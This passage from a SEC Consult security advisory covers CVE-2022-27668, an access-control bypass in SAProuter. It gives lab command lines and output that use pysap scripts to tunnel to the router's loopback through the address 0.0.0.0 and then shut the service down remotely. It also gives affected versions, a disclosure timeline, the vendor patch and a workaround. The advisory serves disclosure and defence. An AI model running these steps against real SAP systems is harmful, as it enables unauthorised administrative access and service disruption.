"loopback" tunnel through the remote SAProuter service by specifying a  
target destination host 127.0.0.1 (option -t) and target destination  
port 3299 (option -r). As expected, this route is filtered and denied  
by default even when explicitly allowed through the route permission  
table.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299  
-t 127.0.0.1 -r 3299 -a 127.0.0.1 -l 3299 -v  
[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.  
56.103:3299 (talk mode raw)  
SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:  
3299  
Routing to 127.0.0.1:3299  
To send 61 bytes data + 4 bytes NI header  
Received 4 bytes NI header, to receive 211 bytes data  
Received 211 bytes data  
Route request to 127.0.0.1:3299 not accepted by 192.168.56.103:3299  
--------------------------------------------------------------------------

It was discovered that it is possible to circumvent this check using  
the non-standard IPv4 broadcast address 0.0.0.0 (see RFC5735, RFC1122).  
When specifying destination host 0.0.0.0 and destination port 3299,  
this leads to an effective access control bypass as can be seen in the  
following listing.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299  
-t 0.0.0.0 -r 3299 -a 127.0.0.1 -l 3299 -v  
[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.  
56.103:3299 (talk mode raw)  
SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:  
3299  
Routing to 0.0.0.0:3299  
To send 59 bytes data + 4 bytes NI header  
Received 4 bytes NI header, to receive 8 bytes data  
Received 8 bytes data  
Route request to 0.0.0.0:3299 accepted by 192.168.56.103:3299

attacker@192.168.56.104$ ss -antlp | grep "3299"  
LISTEN 0    5  127.0.0.1:3299  0.0.0.0:*  users:(("python",pid=1985,fd=3))  
--------------------------------------------------------------------------

Once the tunnel is established, an attacker can leverage administrative  
functions using its local port 3299 which is forwarded to the loopback  
interface of the remote SAProuter instance. For example, the Python  
script router_admin.py [3] of the pysap framework can be used to  
shutdown (option -s) the running SAProuter instance on the remote host.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_admin.py -s -d 127.0.0.1 -p 3299  
[*] Requesting stop of the remote SAP Router  
[*] Connected to the SAP Router 127.0.0.1:3299  
[*] Using SAP Router version 40  
[*] Sending Router Admin packet

netwadm@192.168.56.103$ ./saprouter -r

trcfile dev_rout  
no logging active

WARNING: wildcard character used in route target

shutdown message received, good bye ...  
--------------------------------------------------------------------------

External links:  
[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py  
[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py

Vulnerable / tested versions:  
-----------------------------  
The following versions of the binary were found to be vulnerable during our tests:

- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)  
- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)

No additional testing on other releases has been carried out. According to the vendor  
the following releases and versions are affected by the discovered vulnerability:

- KRNL64NUC     7.49        
- KRNL64UC      7.49        
- SAP_ROUTER    7.53        
- SAP_ROUTER    7.22        
- KERNEL        7.49        
- KERNEL        7.77        
- KERNEL        7.81        
- KERNEL        7.85        
- KERNEL        7.86        
- KERNEL        7.87        
- KERNEL        7.88

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.  
2022-04-04: Requesting status update.  
2022-04-05: Vendor confirms vulnerability and states that a fix is already  
             complete. The corresponding security note is expected to be  
             released with the upcoming April 2022 patch day.  
2022-04-12: Patch day April 2022 passed without release.  
2022-05-10: Patch day May 2022 passed without release.  
2022-06-14: Vendor releases patch with SAP Security Note 3158375.  
2022-06-14: Requesting confirmation that the finding was fixed by the  
             published security note as no prior notification was provided.  
2022-06-28: Vendor confirms that the patch included in Security Note 3158375  
             fixes the issue. The vulnerability got assigned CVE-2022-27668.  
2022-09-14: Release of this security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately.  
The software can be obtained via the SAP service marketplace. Further  
information can be found in the corresponding Security Note 3158375 [4].

[4] https://launchpad.support.sap.com/#/notes/3158375

Workaround:  
-----------  
Remove any wildcard (*) values in the target host or IP address directive  
in route permission table saprouttab entries 'P' and 'S'. In general, it  
is recommended to not make use of any wildcard values in the route permission  
table saprouttab. Additional information on the secure configuration of  
SAProuter can be found in SAP Security Note/KBA 1895350 [5].

[5] https://launchpad.support.sap.com/#/notes/1895350

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF F. Hagg / @2022

Source

Packet Storm